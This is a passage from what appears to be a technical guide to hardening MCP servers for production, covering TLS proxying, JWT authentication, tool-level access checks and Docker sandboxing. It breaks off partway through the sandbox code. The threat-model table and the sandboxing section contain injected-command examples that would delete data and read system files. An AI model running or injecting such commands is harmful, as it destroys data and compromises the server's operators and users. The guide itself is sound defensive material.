
MCP Protocol Production Guide: Security, Sandbox, and Multi-Server Routing

May 17, 2026 · Advanced

30-Second Takeaway

  • Problem Solved: The MCP reference implementations and community examples only cover "getting it running"—no authentication, no sandboxing, no monitoring. Deploying to production as-is is a security incident waiting to happen.
  • Core Method: Build a complete MCP production stack: transport hardening (stdio → Streamable HTTP + TLS), OAuth 2.1 authentication, tool-level RBAC, Docker sandbox isolation, and multi-server gateway routing.
  • Key Insight: The core challenge of production MCP Servers isn't the protocol itself—it's security, isolation, and observability. The official docs cover none of this. This guide fills the gap.
  • What You'll Gain: Production-ready patterns and runnable code to harden any MCP Server for real deployment.

1. Why MCP Needs Production Hardening

Between "it runs" and "it runs in production" lies an entire security model

In 2025, the MCP (Model Context Protocol) ecosystem exploded: the community contributed thousands of MCP Servers covering GitHub, Slack, Postgres, filesystem operations, browser automation, and virtually every common tool category. Most developers can get an MCP Server running in under 10 minutes following a tutorial.

But the gap between "it runs" and "production-ready" is enormous:

  • Reference implementations are single-process. One client, one server. No connection pooling, no load balancing, no failover.
  • Authentication is absent. stdio mode relies on OS process permissions. HTTP mode has zero built-in auth mechanisms. Whoever connects can call every tool.
  • No execution isolation. Tools call subprocess.run() directly on the host. A file-delete tool can wipe the entire server.
  • No audit trail. Who called which tool, with what parameters, and what happened? Completely invisible.

If you plan to expose an MCP Server to multiple users, multiple teams, or external customers—every one of these gaps is a potential security incident.

The MCP Server Threat Model

Before discussing specific hardening measures, we need to map out what threats a multi-tenant MCP Server actually faces:

| Threat Category | Attack Scenario | Consequence |
|---|---|---|
| Unauthorized Access | Attacker connects directly to the MCP Server endpoint without any credentials | Data exfiltration, resource abuse, malicious operations |
| Privilege Escalation | Low-privilege user invokes tools beyond their role (e.g., read-only user triggers a delete) | Data tampering or destruction, system config changes |
| Command Injection | Malicious commands injected through tool parameters (e.g., parameter contains ; rm -rf /) | Full server compromise, ransomware |
| Resource Exhaustion | Malicious client floods server with concurrent tool calls, exhausting CPU/memory/connections | Denial of service for all legitimate users |
| Data Exfiltration | Tool execution reads sensitive data not intended for the current user | User privacy breach, compliance violation |
| Transport Interception | Man-in-the-middle intercepts or modifies stdio data streams or plaintext HTTP | Credential theft, response tampering |

These aren't theoretical. Any MCP Server exposed to multiple users—whether an internal platform's tool gateway or a SaaS product's Agent backend—will inevitably face at least 3-4 of these threat categories.

What This Guide Covers

This is a complete MCP production deployment guide spanning 5 major areas:

  1. Transport Hardening: From stdio to Streamable HTTP + TLS, unified transport switching, connection pooling
  2. Authentication & Authorization: OAuth 2.1 Bearer Token middleware, tool-level RBAC decorator, stdio credential scheme
  3. Tool Sandboxing & Execution Isolation: Docker/gVisor containerized isolation, filesystem and network restrictions, resource limits
  4. Multi-Server Routing & Gateway Architecture: Nginx multi-MCP gateway config, tool registry discovery, tenant-aware routing
  5. Monitoring, Logging & Observability: OpenTelemetry distributed tracing, structured logging, Prometheus metrics and alerting

One-stop coverage for everything the MCP official docs leave out about production deployment.

Prerequisites: This guide assumes you understand MCP fundamentals—Client/Server architecture, JSON-RPC 2.0, and the Tools/Resources/Prompts primitives. If you need a refresher, start here:

  • What Is an AI Agent — From Chatbot to Autonomous Intelligence
  • Multi-Agent Debate System — Structured Adversarial Cross-Examination
  • Model-Agnostic Agent — Building Universal Agents Across LLM Providers

2. MCP Transport Deep Dive

Two transports, one critical decision

MCP is designed to be transport-agnostic—the protocol layer's Tools/Resources/Prompts remain identical regardless of transport. But in production, your transport choice directly determines your deployment architecture, security model, and operational complexity.

MCP supports two transports: stdio (standard input/output) and Streamable HTTP (HTTP-based streaming with SSE support). The difference isn't "simple vs. complex"—it's completely different use cases.

| Dimension | stdio | Streamable HTTP |
|---|---|---|
| Communication | Parent process spawns child; JSON-RPC messages exchanged via stdin/stdout | HTTP POST for requests, Server-Sent Events (SSE) for streaming responses |
| Network Reachability | Local only: client and server must be on the same machine | Cross-network, supports remote deployment and multi-client sharing |
| Concurrency | Single-connection, single-session: one stdio channel serves exactly one client | Natively multi-client: HTTP server handles concurrent sessions |
| Deployment Complexity | Simplest: launch a process | Requires HTTP server, TLS certs, DNS, load balancer, etc. |
| Security | Relies on OS process-level permissions | Requires application-layer auth (OAuth/JWT) + transport-layer encryption (TLS) |
| Reconnection | Process crash = disconnect. Parent must restart the child. | HTTP is stateless; session recovery possible via session IDs |
| Typical Use | Claude Desktop local, IDE plugins, single-user dev environments | SaaS backends, enterprise Agent platforms, multi-tenant tool gateways |

When to use stdio, when to use Streamable HTTP

Use stdio when:

  • You're in development and client + server are on the same machine
  • Tools are used by a single user (e.g., personal Claude Desktop config)
  • Tools operate on local resources only (local files, local databases)
  • OS-level user permissions are sufficient—no network auth needed

Use Streamable HTTP when:

  • Multiple clients (multiple users, multiple applications) need concurrent access
  • Client and server are on different machines (remote deployment)
  • Fine-grained authentication and authorization is required (different users, different tool permissions)
  • You need operational capabilities: logging, monitoring, alerting

A simple rule of thumb: If it's just you, use stdio. If anyone else needs access, use Streamable HTTP.

Transport switching: one server, both transports

In practice, you'll often need: stdio for local debugging, Streamable HTTP for production. Rewriting your server for each transport switch is unacceptable.

The right approach: abstract the transport layer away from core server logic. Here's a TypeScript implementation—the same MCP Server can launch as a stdio process or an HTTP server:

// transport.ts: one server definition, served over either stdio or Streamable HTTP
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp.js";
import express from "express";
import { z } from "zod";

// Core server factory: completely transport-agnostic.
// A factory (rather than one shared instance) lets HTTP mode build a fresh server per request.
function createServer(): McpServer {
  const server = new McpServer({
    name: "production-mcp-server",
    version: "1.0.0",
  });

  // Register tools (example: weather lookup).
  // The input schema is a zod shape; the handler is the third argument.
  server.registerTool(
    "get_weather",
    {
      description: "Get current weather for a specified city",
      inputSchema: { city: z.string().describe("City name") },
    },
    async ({ city }) => {
      // Actual business logic here...
      return { content: [{ type: "text", text: `${city}: Clear, 22°C` }] };
    }
  );

  return server;
}

// Select transport via environment variable
const TRANSPORT = process.env.MCP_TRANSPORT || "stdio"; // "stdio" | "http"

async function main() {
  if (TRANSPORT === "stdio") {
    // stdio mode: runs as a child process, ideal for local dev and Claude Desktop
    const transport = new StdioServerTransport();
    await createServer().connect(transport);
    console.error("MCP Server running on stdio"); // stderr won't interfere with protocol on stdout
  } else if (TRANSPORT === "http") {
    // Streamable HTTP mode: runs as an HTTP server, ideal for production
    const app = express();
    app.use(express.json()); // parse JSON-RPC request bodies

    // POST /mcp: accept JSON-RPC requests (stateless: new server + transport per request)
    app.post("/mcp", async (req, res) => {
      const server = createServer();
      const transport = new StreamableHTTPServerTransport({
        sessionIdGenerator: undefined, // stateless; pass a generator to enable sessions
      });
      // Release resources once the response stream closes
      res.on("close", () => {
        transport.close();
        server.close();
      });
      await server.connect(transport);
      // Forward the HTTP request (with its parsed body) to the transport handler
      await transport.handleRequest(req, res, req.body);
    });

    // GET /health: health check endpoint
    app.get("/health", (_req, res) => {
      res.json({ status: "ok", transport: "http", uptime: process.uptime() });
    });

    const PORT = parseInt(process.env.MCP_PORT || "3000", 10);
    app.listen(PORT, () => {
      console.log(`MCP Server (HTTP) listening on port ${PORT}`);
    });
  } else {
    throw new Error(`Unknown MCP_TRANSPORT: ${TRANSPORT}`);
  }
}

main().catch(console.error);

The core idea: Tool/Resource/Prompt registration logic never changes. You just pick StdioServerTransport or StreamableHTTPServerTransport at startup. One codebase: run npx tsx transport.ts for local dev, and set MCP_TRANSPORT=http for HTTP production mode.

HTTP transport in production: TLS termination & connection pooling

Once you switch to HTTP mode, two infrastructure concerns become mandatory:

TLS Termination

Don't make the MCP Server terminate TLS itself on a public interface. Terminate TLS at a reverse proxy and keep the MCP Server bound to localhost behind it:

┌──────────┐      HTTPS       ┌──────────────┐      HTTP       ┌─────────────┐
│  Client  │ ────────────────→ │ Nginx/Caddy  │ ──────────────→ │  MCP Server │
│          │ ←──────────────── │ (TLS term.)  │ ←────────────── │  (localhost) │
└──────────┘                   └──────────────┘                  └─────────────┘

Use Nginx or Caddy as a reverse proxy to handle TLS termination:

# nginx.conf — MCP Server reverse proxy (TLS termination + connection pooling)
upstream mcp_backend {
    server 127.0.0.1:3000;
    # Connection pool: reuse connections to backend MCP Server
    keepalive 32;
    keepalive_requests 1000;
    keepalive_timeout 60s;
}

server {
    listen 443 ssl http2;
    server_name mcp.example.com;

    # TLS certificates (use Let's Encrypt or your CA)
    ssl_certificate     /etc/ssl/certs/mcp.example.com.pem;
    ssl_certificate_key /etc/ssl/private/mcp.example.com.key;
    ssl_protocols       TLSv1.2 TLSv1.3;
    ssl_ciphers         HIGH:!aNULL:!MD5;

    # Route /mcp requests to MCP Server
    location /mcp {
        proxy_pass http://mcp_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Connection "";  # enable keepalive connection reuse

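        # SSE: disable response buffering so streamed events reach the client immediately
        proxy_buffering off;

        # Timeouts: SSE streaming responses can run for minutes
        proxy_read_timeout 300s;
        proxy_send_timeout 300s;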
    }

    # Health check passthrough
    location /health {
        proxy_pass http://mcp_backend;
        proxy_http_version 1.1;
        proxy_set_header Host $host;
    }
}

Connection Pooling

A Streamable HTTP MCP Server is, at its core, a standard HTTP server. Connection pool management follows standard HTTP best practices:

  • Client side: Use HTTP client connection pools (e.g., Python httpx.AsyncClient with limits, or Node.js undici Pool). Don't rebuild TCP connections for every JSON-RPC call.
  • Server side: Ensure your HTTP framework (Express, Fastify, Starlette) has keep-alive enabled, paired with Nginx's keepalive directive.
  • SSE long-lived connections: Streamable HTTP uses SSE for streaming responses. A single tool invocation can run seconds to minutes. Set Nginx's proxy_read_timeout high enough (e.g., 300s) to avoid killing legitimate long-running tool executions.
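To make the client-side advice concrete, here is a minimal standard-library sketch of connection reuse. It is an illustration under stated assumptions, not a real MCP client: FakeMcpHandler and call_three_times are hypothetical names, and the handler only echoes the JSON-RPC id together with the client's source port so that reuse is observable. In real code a pooled client such as httpx.AsyncClient would play the role of the single http.client.HTTPConnection.

```python
# keepalive_demo.py: send several JSON-RPC calls over one TCP connection (stdlib only)
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class FakeMcpHandler(BaseHTTPRequestHandler):
    """Hypothetical stand-in for an MCP endpoint; it only echoes the request id."""

    protocol_version = "HTTP/1.1"  # HTTP/1.1 keeps the connection open between requests

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        request = json.loads(self.rfile.read(length))
        body = json.dumps({
            "jsonrpc": "2.0",
            "id": request["id"],
            # The client's source port identifies the underlying TCP connection
            "result": {"client_port": self.client_address[1]},
        }).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def call_three_times() -> list:
    """Start a throwaway local server, send three calls on one connection,
    and return the source port the server saw for each call."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), FakeMcpHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1], timeout=5)
    ports = []
    try:
        for request_id in range(3):
            payload = json.dumps({"jsonrpc": "2.0", "id": request_id, "method": "tools/list"})
            conn.request("POST", "/mcp", body=payload,
                         headers={"Content-Type": "application/json"})
            response = json.loads(conn.getresponse().read())
            ports.append(response["result"]["client_port"])
    finally:
        conn.close()
        server.shutdown()
        server.server_close()
    return ports


if __name__ == "__main__":
    print(call_three_times())  # three identical port numbers: one connection was reused
```

All three calls report the same source port because the connection object is created once and kept outside the loop. Creating a new connection inside the loop would instead pay a TCP handshake (and, behind Nginx, a TLS handshake) per call.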

3. Authentication & Authorization

The unavoidable fact: MCP has zero built-in auth

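Start a server from the Python SDK or the TypeScript SDK over HTTP and nothing asks the client who it is. The MCP specification does describe an optional OAuth 2.1-based authorization flow for HTTP transports, but it is opt-in and nothing enforces it by default. This is intentional design: MCP treats authentication as a transport-layer or application-layer concern that the deployer must wire up, not as a mandatory protocol-level primitive.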

But here's what it means in practice: if you do nothing, anyone who can reach your MCP Server endpoint can invoke every tool.

In production, you need two layers of control:

  • Authentication: Verify "who you are"—ensure the request comes from a legitimate client.
  • Authorization: Verify "what you can do"—ensure you can only invoke tools within your permission scope.

OAuth 2.1 Bearer Token Authentication (Streamable HTTP)

For Streamable HTTP transport, the most mature approach is OAuth 2.1 Bearer Token. Clients include Authorization: Bearer <token> in the HTTP header; the server validates the token and extracts permission scopes.

Citable Definition: The MCP authentication layer is the security gateway deployed between the MCP Server and external clients. It verifies client identity (Authentication) and tool invocation permissions (Authorization). MCP itself does not enforce an auth mechanism by default; authentication is implemented at the transport layer (e.g., mutual TLS) or application layer (e.g., OAuth 2.1).

Below is a Python Bearer Token validation middleware that can be embedded into any ASGI-based (Starlette/FastAPI) MCP HTTP Server:

# auth_middleware.py — OAuth 2.1 Bearer Token validation middleware for MCP HTTP Server
import jwt  # PyJWT: pip install pyjwt
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.responses import JSONResponse

# ⚠️ In production, load from environment variables or a secrets manager. Never hardcode.
JWT_SECRET = "your-jwt-secret-placeholder"          # JWT signing key
JWT_ALGORITHM = "HS256"                              # Signing algorithm
ISSUER = "https://auth.example.com"                  # Token issuer (Okta, Auth0, etc.)

class MCPAuthMiddleware(BaseHTTPMiddleware):
    """MCP HTTP Server authentication middleware.
    Validates Bearer tokens on every request and extracts user identity + scopes.
    """

    # Paths that skip authentication (e.g., health checks)
    PUBLIC_PATHS = {"/health", "/.well-known/jwks.json"}

    async def dispatch(self, request, call_next):
        # Allowlist: public paths pass through
        if request.url.path in self.PUBLIC_PATHS:
            return await call_next(request)

        # Extract Bearer token from Authorization header
        auth_header = request.headers.get("Authorization", "")
        if not auth_header.startswith("Bearer "):
            return JSONResponse(
                {"error": "missing_authorization", "message": "Bearer token required"},
                status_code=401,
                headers={"WWW-Authenticate": 'Bearer realm="mcp"'}
            )

        token = auth_header[len("Bearer "):]

        # Validate the JWT
        try:
            payload = jwt.decode(
                token,
                JWT_SECRET,
                algorithms=[JWT_ALGORITHM],
                issuer=ISSUER,
                options={"require": ["exp", "sub", "scope"]}
            )
        except jwt.ExpiredSignatureError:
            return JSONResponse(
                {"error": "token_expired", "message": "Token has expired. Request a new one."},
                status_code=401
            )
        except jwt.InvalidTokenError as e:
            return JSONResponse(
                {"error": "invalid_token", "message": f"Token invalid: {str(e)}"},
                status_code=401
            )

        # Inject user identity and scopes into request.state for downstream use
        request.state.user_id = payload["sub"]         # Unique user identifier
        request.state.scopes = set(payload.get("scope", "").split())  # Permission scope set

        # Log access (in production, use structured logging like structlog)
        print(f"[AUTH] user={payload['sub']} scopes={request.state.scopes} "
              f"path={request.url.path}")

        return await call_next(request)

This middleware does four things:

  1. Checks for a Bearer token in the request header
  2. Validates the JWT signature, expiration, and issuer
  3. Extracts user ID and permission scopes from the token
  4. Injects user context into the request, available to all downstream tool handlers

Token issuance is handled by a separate identity provider—Okta, Auth0, Keycloak, or your cloud provider's identity service (AWS Cognito, GCP Identity Platform). The MCP Server only validates tokens—it never issues them. This follows OAuth 2.1 best practices and keeps your MCP Server's attack surface minimal.
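To show what "validating a token" involves under the hood, here is a minimal standard-library sketch of the HS256 checks: algorithm, signature, expiry, and issuer. It is for illustration only. sign_hs256 and verify_hs256 are hypothetical helper names, the signing helper exists purely so the example can produce a token to verify, and a maintained library such as PyJWT (used in the middleware above) should do this work in production.

```python
# jwt_checks.py: the checks behind HS256 validation, standard library only
import base64
import hashlib
import hmac
import json
import time


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    # JWTs strip base64 padding; restore it before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """Build a compact JWT (demo helper; real tokens come from the identity provider)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url_encode(json.dumps(claims).encode())
    signature = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(signature)}"


def verify_hs256(token: str, secret: str, issuer: str, now: float = None) -> dict:
    """Return the claims if algorithm, signature, expiry, and issuer all check out."""
    try:
        header_b64, body_b64, signature_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(body_b64))
        signature = _b64url_decode(signature_b64)
    except ValueError as exc:  # wrong segment count, bad base64, or bad JSON
        raise ValueError("malformed token") from exc
    if not isinstance(header, dict) or not isinstance(claims, dict):
        raise ValueError("malformed token")
    if header.get("alg") != "HS256":  # never let the token choose the algorithm
        raise ValueError("unexpected algorithm")
    expected = hmac.new(secret.encode(), f"{header_b64}.{body_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):  # constant-time comparison
        raise ValueError("bad signature")
    current_time = time.time() if now is None else now
    if claims.get("exp", 0) <= current_time:
        raise ValueError("token expired")
    if claims.get("iss") != issuer:
        raise ValueError("wrong issuer")
    return claims


if __name__ == "__main__":
    demo_claims = {"sub": "user-1", "scope": "log:read metrics:read",
                   "iss": "https://auth.example.com", "exp": int(time.time()) + 60}
    demo_token = sign_hs256(demo_claims, "demo-secret")
    print(verify_hs256(demo_token, "demo-secret", "https://auth.example.com")["scope"].split())
```

The order of checks matters: the signature is verified before any claim is trusted, and the algorithm is pinned on the server side rather than read from the token.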

Tool-level RBAC: who can call which tool

Authentication tells you who. The bigger question is which tools they can invoke.

Consider a typical internal platform MCP Server exposing these tools:

  • deploy_service — Deploy to production (DevOps only)
  • read_logs — Read application logs (Dev + DevOps)
  • query_metrics — Query monitoring dashboards (entire team)
  • delete_cluster — Delete a Kubernetes cluster (admins only)

Different roles get entirely different tool sets. You need tool-level RBAC (Role-Based Access Control).

Here's a Python @require_scope decorator—one annotation per tool function defines its required permissions:

# rbac.py — Tool-level RBAC decorator for MCP
from functools import wraps
from typing import List

class PermissionDeniedError(Exception):
    """Raised when a user attempts to invoke a tool beyond their scope."""
    def __init__(self, required_scopes: List[str], user_scopes: set):
        self.required_scopes = required_scopes
        self.user_scopes = user_scopes
        super().__init__(
            f"Permission denied. Required: {required_scopes}, user has: {user_scopes}"
        )

def require_scope(*required_scopes: str):
    """Tool-level RBAC decorator.
    Usage:
        @require_scope("deploy:write")
        async def deploy_service(params): ...

    Supports multiple scopes (all must be satisfied):
        @require_scope("admin:read", "cluster:write")
    """
    required = set(required_scopes)

    def decorator(func):
        @wraps(func)
        async def wrapper(ctx, **kwargs):
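            # Retrieve the current user's scopes from the tool-call context.
            # Assumption: your integration layer copies request.state.scopes (set by the
            # auth middleware) onto ctx.user_scopes before the tool runs. A missing
            # attribute yields an empty set, so the check fails closed.
            user_scopes = getattr(ctx, "user_scopes", set())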

            # Check if user has all required scopes
            missing = required - user_scopes
            if missing:
                raise PermissionDeniedError(
                    required_scopes=list(required),
                    user_scopes=user_scopes
                )

            # Permission check passed — execute the tool
            return await func(ctx, **kwargs)
        return wrapper
    return decorator


# ========== Usage examples: registering scope-protected tools ==========

# Deploy to production — requires deploy:write scope
@require_scope("deploy:write")
async def deploy_service(ctx, service_name: str, tag: str):
    """Deploy a service to production."""
    # Trigger CI/CD pipeline, rolling update...
    return f"Service {service_name}:{tag} deployment triggered"

# Read application logs — requires log:read scope
@require_scope("log:read")
async def read_logs(ctx, service_name: str, lines: int = 100):
    """Read recent log lines for a service."""
    # Pull logs from ELK/Loki...
    return f"[{service_name}] Last {lines} lines..."

# Query monitoring metrics — requires metrics:read scope
@require_scope("metrics:read")
async def query_metrics(ctx, metric_name: str, time_range: str):
    """Query a monitoring metric."""
    # Pull from Prometheus/Grafana...
    return f"{metric_name} data for {time_range}..."

# Delete cluster — requires cluster:admin scope (highest sensitivity)
@require_scope("cluster:admin")
async def delete_cluster(ctx, cluster_name: str, confirmation: str):
    """Delete a Kubernetes cluster (dangerous — requires confirmation)."""
    if confirmation != f"DELETE-{cluster_name}":
        raise ValueError("Confirmation string mismatch. Operation cancelled.")
    # Execute cluster deletion...
    return f"Cluster {cluster_name} deletion initiated"

The power of this RBAC scheme is declarative permission control:

  • For developers: Write a new tool, think about who should use it, add @require_scope("xxx:write"). No if/else permission logic anywhere in the tool body.
  • For security audits: Every tool's required permissions are instantly visible—just read the decorator arguments.
  • For operations: Permission scopes are assigned at token issuance time (in Okta/Auth0). The MCP Server only validates. Changing permissions requires zero code changes.

Scope naming convention: use the <resource>:<action> format—deploy:write, log:read, cluster:admin. This is clear, readable, and trivially extensible to new tool categories.
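The naming convention and the role split described above can be sketched as a small lookup. The tool-to-scope mapping mirrors the decorators in rbac.py; the role-to-scope mapping is a hypothetical example (in practice the identity provider owns it), and validate_scope and callable_tools are illustrative helper names.

```python
# scopes.py: validate scope names and derive which tools each role can call
import re

# <resource>:<action>, lowercase, e.g. deploy:write
SCOPE_PATTERN = re.compile(r"[a-z][a-z0-9_]*:[a-z][a-z0-9_]*")

# Tool -> required scope, mirroring the @require_scope decorators
TOOL_SCOPES = {
    "deploy_service": "deploy:write",
    "read_logs": "log:read",
    "query_metrics": "metrics:read",
    "delete_cluster": "cluster:admin",
}

# Role -> granted scopes. Hypothetical mapping for illustration only.
ROLE_SCOPES = {
    "developer": {"log:read", "metrics:read"},
    "devops": {"deploy:write", "log:read", "metrics:read"},
    "admin": {"cluster:admin", "metrics:read"},
}


def validate_scope(scope: str) -> str:
    """Reject scope names that do not follow the <resource>:<action> convention."""
    if not SCOPE_PATTERN.fullmatch(scope):
        raise ValueError(f"invalid scope name: {scope!r}")
    return scope


def callable_tools(role: str) -> list:
    """Return the sorted tool names a role may invoke; unknown roles get nothing."""
    granted = ROLE_SCOPES.get(role, set())
    return sorted(tool for tool, scope in TOOL_SCOPES.items() if scope in granted)


# Fail at import time if any configured scope breaks the convention
for _scope in TOOL_SCOPES.values():
    validate_scope(_scope)

if __name__ == "__main__":
    for role in ROLE_SCOPES:
        print(role, callable_tools(role))
```

Validating scope names at startup catches typos such as "deploy-write" before they silently lock every user out of a tool.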

stdio transport authentication: environment credentials

In stdio mode, client and server are on the same machine, communicating via inter-process communication. OAuth 2.1 doesn't apply—network authentication is meaningless when there's no network.

stdio authentication relies on OS-level process isolation and environment variable injection:

// claude_desktop_config.json — Claude Desktop MCP Server configuration
{
  "mcpServers": {
    "production-tools": {
      "command": "python",
      "args": ["-m", "mcp_server"],
      "env": {
        "MCP_TRANSPORT": "stdio",
        "MCP_API_KEY": "your-api-key-placeholder",
        "MCP_USER_ROLE": "developer",
        "MCP_ALLOWED_TOOLS": "read_logs,query_metrics"
      }
    }
  }
}

The server reads environment variables to verify identity and enforce restrictions:

# stdio_auth.py — Environment-credential authentication for stdio mode
import os

def get_stdio_identity():
    """Read identity and permissions from environment variables,
    injected by the client (e.g., Claude Desktop) when spawning the server process.
    """
    api_key = os.environ.get("MCP_API_KEY")
    if not api_key:
        raise RuntimeError("stdio mode requires MCP_API_KEY environment variable")

    # In production, validate the API key against your auth service
    # For high-security scenarios, combine with mTLS or Unix socket permissions
    user_role = os.environ.get("MCP_USER_ROLE", "viewer")
    allowed_tools = os.environ.get("MCP_ALLOWED_TOOLS", "").split(",")

    return {
        "api_key": api_key,
        "role": user_role,
        "allowed_tools": [t.strip() for t in allowed_tools if t.strip()],
    }

Three principles for stdio authentication:

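  1. Secrets via environment variables: never hardcode them in server code. The env block in the client config is where they get injected, so keep that file out of version control and readable only by its owner.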
  2. Tool allowlisting—the MCP_ALLOWED_TOOLS environment variable limits which tools are exposed to the LLM, even if 20 tools are registered in code.
  3. Least privilege—each stdio server instance gets the minimum permissions needed for its task. Switching tasks? Restart with a more constrained instance.
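The allowlisting principle can be sketched as a filter applied before tools are registered with the server. This is a minimal illustration: exposed_tools and parse_allowlist are hypothetical helper names, and the registry is modeled as a plain dict of name to handler rather than any specific SDK structure.

```python
# tool_allowlist.py: expose only the tools named in MCP_ALLOWED_TOOLS
def parse_allowlist(raw: str) -> set:
    """Split a comma-separated list, ignoring blanks and surrounding whitespace."""
    return {name.strip() for name in raw.split(",") if name.strip()}


def exposed_tools(registered: dict, env: dict) -> dict:
    """Return the subset of registered tools that the environment allows.

    Fails closed: a missing or empty MCP_ALLOWED_TOOLS exposes nothing.
    """
    allowed = parse_allowlist(env.get("MCP_ALLOWED_TOOLS", ""))
    unknown = allowed - set(registered)
    if unknown:
        # A typo in the allowlist should be loud, not silently ignored
        raise ValueError(f"allowlist names unknown tools: {sorted(unknown)}")
    return {name: handler for name, handler in registered.items() if name in allowed}


if __name__ == "__main__":
    import os

    registry = {
        "read_logs": lambda: "logs",
        "query_metrics": lambda: "metrics",
        "delete_cluster": lambda: "deleted",
    }
    print(sorted(exposed_tools(registry, dict(os.environ))))
```

Because the filter runs before registration, a tool that is not allowlisted never appears in the tools/list response, so the LLM cannot attempt to call it.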

Authentication summary

| Transport | Auth Scheme | Use Case | Identity Provider |
|---|---|---|---|
| Streamable HTTP | OAuth 2.1 + JWT Bearer Token + scope-based RBAC | Multi-tenant SaaS, enterprise Agent platforms, internet-facing MCP gateways | Okta, Auth0, AWS Cognito, Keycloak |
| stdio | Environment-injected API key + tool allowlist | Claude Desktop local integration, IDE plugins, single-user dev | N/A (local process communication) |

Authentication and authorization are the first line of defense for MCP production hardening. But even when auth passes, tool execution itself is still dangerous—what if a legitimate user calls a legitimate tool, but the tool executes a malicious command internally? That's what the next section covers: tool sandboxing and execution isolation.

For more background on Agent tool design principles:

  • Agent Tool Design Best Practices — 8 Rules from Production

4. Tool Sandboxing and Execution Isolation

Every tool call is a blob of untrusted code

Authentication and authorization tell you who can call which tool. But even a legitimate user calling a legitimate tool can cause damage—because LLM-generated parameters are inherently unpredictable.

Consider a file-operation tool search_files that accepts a pattern parameter:

  • Normal call: pattern="*.log" — search for log files
  • Malicious / LLM-hallucinated call: pattern="/etc/passwd; rm -rf /data/*" — if the tool uses shell=True internally, this is a disaster

The core principle of sandboxing: the tool execution environment must be fully isolated from the host. Even if a tool executes a malicious command inside the sandbox, consumes excessive resources, or writes to forbidden locations—the host and other tenants remain unaffected.
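Sandboxing is the outer wall, but the search_files example also benefits from input validation inside the tool. The following is a minimal sketch of a shell-free implementation: the allowed character set in SAFE_PATTERN is an assumption chosen for illustration, and the function signature is hypothetical rather than taken from any existing tool.

```python
# safe_search.py: a search_files sketch that never hands the pattern to a shell
import fnmatch
import re
import tempfile
from pathlib import Path

# Assumed policy: letters, digits, and a few glob characters; no slashes, spaces, or ';'
SAFE_PATTERN = re.compile(r"[A-Za-z0-9_.*?\-]+")


def search_files(root: str, pattern: str) -> list:
    """Return paths under root (relative, POSIX style) whose file name matches pattern."""
    if not SAFE_PATTERN.fullmatch(pattern):
        raise ValueError(f"rejected pattern: {pattern!r}")
    base = Path(root).resolve()
    matches = []
    for path in base.rglob("*"):
        # Matching happens in Python, so shell metacharacters have no special meaning
        if path.is_file() and fnmatch.fnmatch(path.name, pattern):
            matches.append(path.relative_to(base).as_posix())
    return sorted(matches)


# Small demonstration against a throwaway directory
with tempfile.TemporaryDirectory() as tmp:
    (Path(tmp) / "app.log").write_text("ok")
    (Path(tmp) / "notes.txt").write_text("ok")
    (Path(tmp) / "sub").mkdir()
    (Path(tmp) / "sub" / "worker.log").write_text("ok")
    found = search_files(tmp, "*.log")

print(found)  # ['app.log', 'sub/worker.log']
```

With this shape, the hallucinated pattern from the example above is rejected by the validation step, and even a pattern that passed validation would only ever be compared against file names.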

Option 1: Docker container sandbox (recommended for production)

Docker provides the most mature process isolation model and is suitable for the vast majority of production scenarios. The idea: every tool invocation runs in a brand-new Docker container, which gets destroyed immediately after execution completes.

Here's a Python Docker sandbox executor:

# sandbox_executor.py — Docker container sandbox executor
import subprocess
import uuid
from typing import Dict, Optional
from dataclasses import dataclass

@dataclass
class SandboxConfig:
    """Sandbox configuration — per-tool-call resource limits"""
    image: str = "mcp-sandbox:latest"      # Sandbox base image
    cpu_limit: str = "0.5"                  # Max CPU cores
    memory_limit: str = "256m"             # Max memory
    timeout_seconds: int = 30              # Execution timeout
    network_mode: str = "none"             # Network isolation: none = fully air-gapped
    read_only_root: bool = True            # Root filesystem read-only
    tmpfs_size: str = "64m"               # Temp filesystem size
    workspace_dir: str = "/workspace"      # Working directory inside container

class DockerSandboxExecutor:
    """Docker sandbox executor.
    Each tool call executes in a fresh container; the container is
    automatically destroyed after the call completes.
    """

    def __init__(self, config: SandboxConfig = SandboxConfig()):
        self.config = config

    def execute(self, tool_name: str, command: list,
                env: Optional[Dict[str, str]] = None) -> Dict:
        """Execute a command inside an isolated Docker container.
        Args:
            tool_name: Tool name (used for container naming and logging)
            command: Command + argument list (never use shell=True)
            env: Environment variables to inject into the container
        Returns:
            Dict with tool, container, exit_code, stdout, stderr, killed_by_timeout fields
        """
        container_name = f"mcp-sandbox-{tool_name}-{uuid.uuid4().hex[:8]}"

        docker_cmd = [
            "docker", "run",
            "--rm",                              # Auto-remove container after exit
            "--name", container_name,
            # Resource limits (cgroups v2)
            "--cpus", self.config.cpu_limit,
            "--memory", self.config.memory_limit,
            "--memory-swap", self.config.memory_limit,  # Disable swap
            # Filesystem restrictions
            "--read-only",                        # Root filesystem read-only
            "--tmpfs", f"/tmp:rw,size={self.config.tmpfs_size},noexec,nosuid",
            # Network isolation
            "--network", self.config.network_mode,
            # Security hardening
